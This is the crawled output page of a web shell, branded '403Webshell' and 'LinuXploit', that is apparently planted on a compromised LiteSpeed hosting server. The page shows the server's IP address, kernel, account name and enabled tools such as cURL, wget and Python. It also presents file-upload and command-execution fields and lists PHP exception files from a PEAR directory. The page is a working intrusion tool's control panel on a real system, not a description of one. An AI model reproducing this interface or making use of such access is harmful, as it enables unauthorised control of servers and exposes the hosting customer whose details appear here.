403Webshell
Server IP : 66.29.132.122  /  Your IP : 18.222.32.67
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/alt/php53/usr/share/pear/ezc/Base/exceptions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
March 03 2024 22:55:03
root / root
0755
autoload.php
1.111 KB
December 18 2019 11:15:09
root / root
0644
double_class_repository_prefix.php
1.079 KB
December 18 2019 11:15:09
root / root
0644
exception.php
0.911 KB
December 18 2019 11:15:09
root / root
0644
extension_not_found.php
1.048 KB
December 18 2019 11:15:09
root / root
0644
file_exception.php
0.539 KB
December 18 2019 11:15:09
root / root
0644
file_io.php
1.453 KB
December 18 2019 11:15:09
root / root
0644
file_not_found.php
1.067 KB
December 18 2019 11:15:09
root / root
0644
file_permission.php
2.161 KB
December 18 2019 11:15:09
root / root
0644
functionality_not_supported.php
0.806 KB
December 18 2019 11:15:09
root / root
0644
init_callback_configured.php
0.916 KB
December 18 2019 11:15:09
root / root
0644
invalid_callback_class.php
0.855 KB
December 18 2019 11:15:09
root / root
0644
invalid_parent_class.php
0.813 KB
December 18 2019 11:15:09
root / root
0644
property_not_found.php
0.738 KB
December 18 2019 11:15:09
root / root
0644
property_permission.php
1.095 KB
December 18 2019 11:15:09
root / root
0644
setting_not_found.php
0.827 KB
December 18 2019 11:15:09
root / root
0644
setting_value.php
1.334 KB
December 18 2019 11:15:09
root / root
0644
value.php
1.438 KB
December 18 2019 11:15:09
root / root
0644
whatever.php
1.256 KB
December 18 2019 11:15:09
root / root
0644

Youez - 2016 - github.com/yon3zu
LinuXploit